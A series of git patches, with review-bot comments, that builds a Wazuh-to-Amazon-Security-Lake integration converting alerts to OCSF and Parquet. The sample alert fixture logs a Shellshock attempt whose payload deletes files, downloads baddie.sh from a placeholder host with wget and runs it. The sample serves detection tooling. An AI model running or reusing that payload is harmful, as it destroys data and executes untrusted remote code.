@@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From 5e3c0fae21e1b58ec65571b30dba231d8ab828b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 12/77] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file 
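Review bot: `with open(ocsf_mapping_filename) as jsonfile:` uses a name that is never defined in this file; the path parsed by `parse_arguments()` is `args.mapping`, so this should read `with open(args.mapping) as jsonfile:` (and `args` itself only exists once `parse_arguments()` returns it to the caller). `json.loads(jsonfile.read())` can simply be `json.load(jsonfile)`. The enclosing `try` block continues outside the hunk.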
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py 
@@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json 
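Review bot: `convert` indexes `event["_source"]["rule"]["mitre"]["tactic"]`, `["technique"]`, `["nist_800_53"]` and `["full_log"]` directly, yet none of these keys is present on every Wazuh alert, so a single event without MITRE or NIST annotations raises `KeyError` and aborts the conversion; bind `source = event["_source"]` and `rule = source["rule"]` once and read optional fields with `.get()`, e.g. `rule.get("mitre", {}).get("tactic", [])`. `normalize` returns the rule level unchanged although its docstring says it must map into the 0–6 range, so `severity_id` currently carries values the target schema does not allow. The module-level `event = {}` is unused and shadows the parameter name, and `"vendor_name": "Wazuh, Inc,."` has a stray comma. The inline `# Err:` comments already record that `analytic.category`, `attacks.tactic` and `attacks.technique` receive arrays where the schema wants a string or object, which is worth resolving before output is sent to Security Lake.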
@@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From 0995134abe83564e37d38ed65817cdb661e4f045 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 13/77] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 + .../{ => logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf 
+++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. 
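Review bot: `target => "_source"` nests the fetched document under `_source`, which is what the converter on this page dereferences, but `_index` — also read by the converter, under `unmapped.data_sources` — is hit metadata rather than part of the document and will not appear under that key; if the opensearch input behaves like the elasticsearch one, it is only exposed when `docinfo` is enabled and then lands under `@metadata`, so the two files should agree on where `_index` comes from before it is relied on. A comment next to the new line such as `# nest the hit under _source so the OCSF converter sees event["_source"][...]` would document the coupling.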
@@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." 
+ { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py 
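Review bot: the new `join` helper collapses `rule.mitre.technique` and `rule.mitre.id` into single comma-separated strings, so an alert with two techniques yields `"uid": "T1068,T1190"`, which is not one technique id; if I read the OCSF schema correctly `finding_info.attacks` is an array of attack objects, so the natural shape is one `{"tactic": ..., "technique": {"name": ..., "uid": ...}}` entry per technique rather than a single joined object. `join` also has no guard for a missing `mitre` key, and its body `return (separator.join(iterable))` carries redundant parentheses; a docstring stating that it exists only to flatten Wazuh string arrays into OCSF string fields would explain why it is not just `",".join`. The `"Wazuh, Inc,."` typo survives the rewrite.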
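Review bot: `Parquet.to_s3` is a bare `pass`, so a caller that wires it up gets a successful return while nothing is uploaded; make the stub fail loudly with `raise NotImplementedError("to_s3 is not implemented yet")` until the S3 path exists. `encode` builds the table with `pa.Table.from_pydict(data)`, which expects a mapping of column name to array-like, while the accompanying test on this page feeds events through `pa.Table.from_pylist([...])`; a single OCSF event dict passed to `encode` has scalar values and will not form columns, so either `encode` should take a list of events and call `from_pylist`, or its docstring needs to state that `data` is column-oriented. Each static method would benefit from a one-line docstring naming the pyarrow entry point it wraps.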
@@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From d82ed21eafd26f1569b93e7c779ef06b3f6e8f69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 14/77] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore 
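Review bot: `pyarrow>=10.0.1` and `parquet-tools>=0.2.15` are open-ended lower bounds, so each install resolves to whatever the index serves that day and two deployments can differ silently; pin exact versions (or add an upper bound) and consider a hash-pinned lock for the integration's runtime. `parquet-tools` looks like an inspection utility rather than something `stdin_to_securitylake.py` or `parquet.py` import, so it probably belongs in a separate dev/test requirements file rather than the runtime one.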
@@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 
+# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From 17dac0ca7ddb65b46e3639aaee554e43fc5f34d2 Mon Sep 17 00:00:00 2001 
From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 15/77] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From a4f74db6b0d4442a3346c2a327c0e2aace37b8f8 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 16/77] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json 
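Review bot: `ocsf_output['unmapped'] = alert_dictionary` stores a reference to the whole alert, including every field the loop above has already copied into `ocsf_output`, so the OCSF record duplicates the event and any later mutation of the alert dict shows up in the output; since the mapping values are the dotted source paths, the fields to crop are already known and can be deleted from a copy while walking `depth_levels`. The `###` comment prefix also differs from the `#` style used elsewhere in this module. `map_to_ocsf` starts outside the hunk.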
@@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" 
: ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
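Review bot: the new `"1.1.0"` entry still declares `class_name: "Security Finding"`, `class_uid: 2001` and `type_uid: 200101`, while `ocsf/converter.py` on this page emits Detection Finding (`class_uid: 2004`, `type_uid: 200401`) for the same `"version": "1.1.0"`; the two 1.1.0 definitions disagree on the class and only one of them can be what Security Lake expects. `"attacks.tactics"` in the 1.0.0 block is plural while every other key and the 1.1.0 counterpart `finding_info.attacks.tactic` is singular, which looks like a typo carried over from the old file. Both versions map `rule.level` straight to `severity_id` with no normalization, so levels above 6 would go out as-is.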
@@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') 
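Review bot: `ocsf_output = {}` on the line after the signature rebinds the parameter, so the caller's `ocsf_mapped_alert` stays empty and everything the new `mappings[ocsfschema]` lookups populate is discarded when the function returns. The loop also reads `dotted_destination.split('.')` after assigning `dotted_destination_field`, which is a `NameError`, and `len(depth_levels>1)` compares the list with an int before calling `len`; the fix is to drop the rebinding and use `depth_levels = dotted_destination_field.split('.')` and `if len(depth_levels) > 1:`. `map_to_ocsf`'s body continues past the hunk.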
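Review bot: `--ocsfschema` accepts any string and an unsupported version only surfaces as a `KeyError` inside `map_to_ocsf` on the first event; once the mapping file is loaded, validate it up front with `if args.ocsfschema not in mappings: parser.error(f"unknown OCSF schema version {args.ocsfschema!r}")`. The help text could also list the versions the shipped `ocsf-mapping.json` defines so operators know what `-v` can take. `parse_arguments` continues outside the hunk.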
